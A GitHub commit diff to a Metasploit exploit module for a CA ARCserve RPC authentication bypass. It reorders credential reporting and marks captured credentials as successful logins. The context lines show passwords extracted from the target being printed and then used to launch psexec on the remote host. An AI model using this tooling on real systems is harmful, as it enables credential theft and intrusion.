Skip to content

Commit 7e91121

Browse files
committed
Change to Metasploit::Model::Login::Status::SUCCESSFUL
1 parent 78e4677 commit 7e91121

File tree

1 file changed

+10
-10
lines changed

1 file changed

+10
-10
lines changed

modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb

Lines changed: 10 additions & 10 deletions
Original file line numberDiff line numberDiff line change
@@ -78,7 +78,7 @@ def report_cred(opts)
7878

7979
login_data = {
8080
core: create_credential(credential_data),
81-
status: Metasploit::Model::Login::Status::UNTRIED,
81+
status: Metasploit::Model::Login::Status::SUCCESSFUL,
8282
}.merge(service_data)
8383

8484
create_credential_login(login_data)
@@ -130,15 +130,6 @@ def exploit
130130
pass = resp[pass_index+1].gsub(/\"/, "")
131131
end
132132

133-
# report the auth
134-
report_cred(
135-
ip: datastore['RHOST'],
136-
port: 445,
137-
service_name: 'smb',
138-
user: user,
139-
password: pass
140-
)
141-
142133
srvc = {
143134
:host => datastore['RHOST'],
144135
:port => datastore['RPORT'],
@@ -154,6 +145,15 @@ def exploit
154145

155146
print_good("Collected credentials User: '#{user}' Password: '#{pass}'")
156147

148+
# report the auth
149+
report_cred(
150+
ip: datastore['RHOST'],
151+
port: 445,
152+
service_name: 'smb',
153+
user: user,
154+
password: pass
155+
)
156+
157157
# try psexec on the remote host
158158
psexec = framework.exploits.create("windows/smb/psexec")
159159
psexec.register_parent(self)

0 commit comments

Comments
 (0)